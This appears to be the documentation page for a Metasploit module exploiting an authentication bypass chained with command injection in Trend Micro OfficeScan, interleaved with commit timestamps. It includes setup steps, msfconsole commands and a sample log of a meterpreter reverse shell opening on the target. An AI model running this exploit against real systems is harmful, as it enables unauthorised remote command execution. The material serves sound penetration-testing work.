2017-10-08 17:54:18 +03:00
## Vulnerable Application
This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a terminal command under the context of the web server user.
2017-10-09 22:11:42 +03:00
The Trend Micro OfficeScan product has a widget feature which is implemented with PHP. Talker.php takes ack and hash parameters but doesn't validate these values, which leads to an authentication bypass for the widget. Proxy.php files under the mod TMCSS folder take multiple parameters but the process does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the web server user.
2017-10-08 17:54:18 +03:00
**Vulnerable Application Installation Steps **
1. Open following URL [http://downloadcenter.trendmicro.com/ ](http://downloadcenter.trendmicro.com/ )
2. Find "OfficeScan" and click.
3. At the time of writing this documentation, you must see "osce-xg-win-en-gm-b1315.exe" next to Download button.
4. Click to the download button and complete installation of ISO.
5. Install the downloaded file on Windows operating system. (Tested with Windows 7)
If you don't see an affected version of OfficeScan, you can try to download it directly from following URL.
2017-10-09 22:11:42 +03:00
[http://download.trendmicro.com/products/officescan/XG/osce_xg_win_en_gm_b1315.exe ](http://download.trendmicro.com/products/officescan/XG/osce_xg_win_en_gm_b1315.exe )
2017-10-08 17:54:18 +03:00
## Verification Steps
A successful check of the exploit will look like this:
- [ ] Start `msfconsole`
2017-10-09 22:11:42 +03:00
- [ ] `use exploit/windows/http/trendmicro_officescan_widget_exec`
2017-10-08 17:54:18 +03:00
- [ ] Set `RHOST`
- [ ] Set `LHOST`
- [ ] Run `check`
2017-10-09 22:11:42 +03:00
- [ ] **Verify ** that you are seeing `The target is vulnerable.`
2017-10-08 17:54:18 +03:00
- [ ] Run `exploit`
2017-10-09 22:11:42 +03:00
- [ ] **Verify ** that you are seeing `Authenticated successfully bypassed` value.
2017-10-08 17:54:18 +03:00
- [ ] **Verify ** that you are getting `meterpreter` session.
## Scenarios
2017-10-09 20:31:23 -04:00
### Trend Micro OfficeScan 11 on Win7
2017-10-08 17:54:18 +03:00
```
2017-10-09 22:11:42 +03:00
msf exploit(trendmicro_officescan_widget_exec) > exploit
2017-10-08 17:54:18 +03:00
[*] Started reverse TCP handler on 12.0.0.1:4444
2017-10-09 22:11:42 +03:00
[*] Auto detection enabled. Trying to detect target system version.
[*] Target system selected : OfficeScan 11
2017-10-08 17:54:18 +03:00
[*] Exploiting authentication bypass
2017-10-09 22:11:42 +03:00
[+] Authenticated successfully bypassed.
2017-10-08 17:54:18 +03:00
[*] Generating payload
2023-10-10 14:46:18 -04:00
[*] Triggering command injection vulnerability
2017-10-09 22:11:42 +03:00
[*] Sending stage (179267 bytes) to 12.0.0.176
[*] Meterpreter session 9 opened (12.0.0.1:4444 -> 12.0.0.176:49842) at 2017-10-09 21:57:29 +0300
2017-10-08 17:54:18 +03:00
meterpreter > sysinfo
Computer : CME
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : tr_TR
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter >
2017-10-09 20:31:23 -04:00
```